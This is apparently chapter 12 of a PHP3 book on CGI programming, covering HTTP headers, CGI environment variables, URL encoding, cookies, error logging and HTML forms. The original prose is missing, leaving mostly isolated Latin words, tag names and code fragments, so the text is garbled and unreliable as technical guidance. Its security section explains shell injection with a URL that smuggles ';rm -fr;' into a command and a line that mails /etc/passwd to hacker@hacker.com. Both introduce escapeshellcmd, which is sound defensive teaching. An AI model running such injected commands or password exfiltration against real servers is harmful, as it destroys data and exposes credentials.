12 CGI
CGI (Common Gateway Interface) Web PHP CGI HTML HTTP HTML Web HTTP We Web Internet RFC http://www.ietf.org/ PHP CGI CG Apache CGI PHP PH Apache HTML CGI CGI Web CGI Common Gateway Interface Web CGI CGI CG CGI CG
12.1 CGI Java Applet CGI Java CGI CGI Java Applet CGI Web HTML Java
190 PHP3
Internet CGI Java CGI Java http://www.netcharts.com java Applet HTML
12.2 CGI JavaScript CGI JavaScript CGI JavaScript CGI JavaScript CGI JavaScript
12.3 PHP LIB CGI
12.4 CGI CGI Web CGI CG Linux Apache MySQL PHP Web CGI Web CGI CGI Web CGI
12.5 CGI CGI Web CGI URL Web CGI Web test.php3 CGI URL CG Web CGI CGI URL CGI Web Linux
Apache Web /usr/local/apache/cgi-bin/test.php3 Windows 95 Web /website/cgi-shl/test.php3 Web CGI Web CGI CGI URL CGI HTML URL CGI CGI CG /root/document PATH_INFO CGI CGI QUERY_STRING CGI CGI 12.7 CGI CGI URL
12.6 HTTP CGI HTTP SSI 12-1 HTTP PHP header HTTP
header('Content-Type: text/html');
PHP
echo "Content-Type: text/html\n\n";
HTTP HTT
HTTP HTML GIF
Content-Type: text/plain
Content-Type: text/html
Content-Type: image/gif
Cookies
Set-cookie: ...
Status: 402
Location: http://www.foobar.com
Netscape MIME text/plain text/html text/plain text/html MIME Location Web CGI 10 URL
echo "Location: $nextpage\n\n";
Location Cookies Set-cookie HTTP Status
12.7 CGI CGI Web IP Web We CGI
PHP CGI 12-2
AUTH_TYPE CONTENT_LENGTH CONTENT_TYPE DOCUMENT_ROOT GATEWAY_INTERFACE HTTP_ACCEPT HTTP_USER_AGENT HTTP_FROM QUERY_STRING PATH_INFO PATH_TRANSLATED REMOTE_ADDR REMOTE_HOST REMOTE_IDENT REMOTE_USER REQUEST_METHOD SCRIPT_NAME SCRIPT_FILENAME SERVER_NAME SERVER_PORT SERVER_PROTOCOL SERVER_SOFTWARE
Web PHP $HTTP_POST_VARS POST application/octet-stream apache /usr/local/apache/htdocs Web CGI CGI/1.1 MIME image/gif image/x-xbitmap image/jpeg image/pjpeg image/png, / Netscape Mozilla email HTML GET CGI PHP $HTTP_GET_VARS HTTP IP IDENTD GET POST CGI PHP $HTTP_GET_VARS $HTTP_GET_VARS PHP $PHP_SELF Web 80 HTTP/1.0 Web webSite/1.1 e PHP $PHP_SELF $PHP_SELF $PHP_SEL getenv
$PHP_SELF = getenv("PHP_SELF");
12.8 URL WWW HTTP David Medinets URL 8-bit % Davy Jones <dj@mtolive.com> Davy+Jones+%3Cdj@mtolive.com%3E < %3C > %3E
12.8.1 rawurlencode PHP rawurlencode URL URL rawurlencode Internet rawurlencode HTML
12.8.2 PHP URL 1) a.html 2) a.php3 3) a.html!aaa bbb<@bbbb!
12.9 Web CGI CGI PATH_INFO CGI URL http://www.foo.com/cgi-bin/dirlist.php3/docs PATH_INFO docs l ls URL http://www.foo.com/cgi-bin/dirlist.php3/;rm -fr; CGI mail sendmail grep PHP mail hacker@hacker.com < /etc/passwd password mail PHP escapeshellcmd escapeshellcmd
12.10 cookie HTTP IP CGI cookie cookies HTTP HTTP cookie Web cookie cookie
12.10.1 cookie cookie cooki Web 300 cookie Web 20 cookie cookie 4KB cookie 1.2M cookie cookie cookie.txt Netscape cookie cookie cookie cookies.txt Macintosh cookie MagicCookie
12.10.2 cookie set-cookie HTTP cookie HTTP 5 5
cookie-name=cookie-value; cookie cookie 4KB
expires=expiration-date; cookie cookie cookie cookie cookie cookie cookie
path=cookie-path; cookie
domain=server-domain; cookie Web www cookie.foo.net www.foo.net cookie
secure HTTP cookie
Web HTTP_COOKIE cookie CGI cookie cookie PHP PHP HTTP_COOKIE $HTTP_COOKIE_VARS PHP usercookie $usercookie 12-1 cookie userid cooki cookie cooki
12-1 cookie.php3 setcookie cookie
12.10.3 cookie cookie cooki cookie cookie cookie cooki 12-2 cookie CGI cookie TESTING cookie cookie cookie
12-2 test.php3 cookie
HTTP cookie
12.11 CGI CGI HTML 500 HTTP HTTP
12.11.1 PHP error_log 12-3 error_log
12-3 server log.php3 error_log
This is line one. This is line two. /usr/local/apache/htdocs/error_log Web
error_log("php: GOOD Status\n");
12.11.2 HTML HTTP 12-4 12-1 error_exit 12-1 error_exit
12-4 error.php3
12.12 CGI HTML HTML 5 HTML Web
12.12.1 HTML HTML Web HTML HTML (tag) <B> </B> HTML HTML HTM <HEAD>...</HEAD> HTML <TITLE> </TITLE> HTML HTML <TITLE> <title> HTML HTML HTML <BODY>...</BODY> <H1> </H1> H H1 1 H2 2 <P> <BR> <B> </B> <I>...</I> HTML <HTML> </HTML> <BODY>...</BODY>
12.12.2 HTML HTML ( ) <FORM>...</FORM> HTML <FORM>...</FORM> METHOD ACTION METHOD CGI POST GET ACTION URL mailto ACTION="mailto:medinet@mtolive.com" ACTION="/cgi-bin/feedback.php3" CGI <INPUT> <FORM> <INPUT> CHECKED NAME SIZE MAXLENGTH MAXLENGT SIZE TYPE checkbox hidden password radio reset submit text VALUE HTML WasWaldo 50 25 25 password <INPUT TYPE=password NAME=password SIZE=10> password password <INPUT>
URL CGI VALUE <INPUT TYPE="submit" VALUE="Process Information"> Hidden CGI CGI CGI 5 <SELECT> CPU <SELECT>...</SELECT> <SELECT>...</SELECT>
SELECTED 3 3 3 SELECT <TEXTAREA>...</TEXTAREA> <TEXTAREA> ROWS COLS <TEXTAREA>...</TEXTAREA> WRAP virtual <TEXTAREA NAME="comments" ROWS="3" COLS="60" WRAP="virtual"> WRAP WRA physical HTML
12.12.3 POST GET <FORM> METHOD GET <FORM METHOD="get" ACTION="/cgi-bin/gestbook.php3"> GET URL CGI URL ACTION QUERY_STRING CGI GET Web URL GET POST POST STDIN CGI Web CONTENT_LENGTH CGI PHP CGI PHP $HTTP_GET_VARS $HTTP_POST_VARS PHP age $ag $HTTP_POST_VARS[age] POST
12.13 CGI CGI Web CGI Java Applet CGI URL URL HTML
CGI HTTP Content-type HTML Location URL Set-cookie Status URL CGI PATH_INFO QUERY_STRING PHP PHP $HTTP_POST_VARS $HTTP_GET_VARS CGI Web REMOTE_ADDR IP SCRIPT_NAME URL < %3C mail grep Web Cookies PHP error_log HTML HTML <P> <H>...</H> HTML <HTML>...</HTML> <HTML>...</HTML> <HEAD>...</HEAD> <BODY>...</BODY> HTML HTML <FORM>...</FORM> ACTION Web CGI URL METHOD CGI GET $HTTP_GET_VARS POST $HTTP_POST_VARS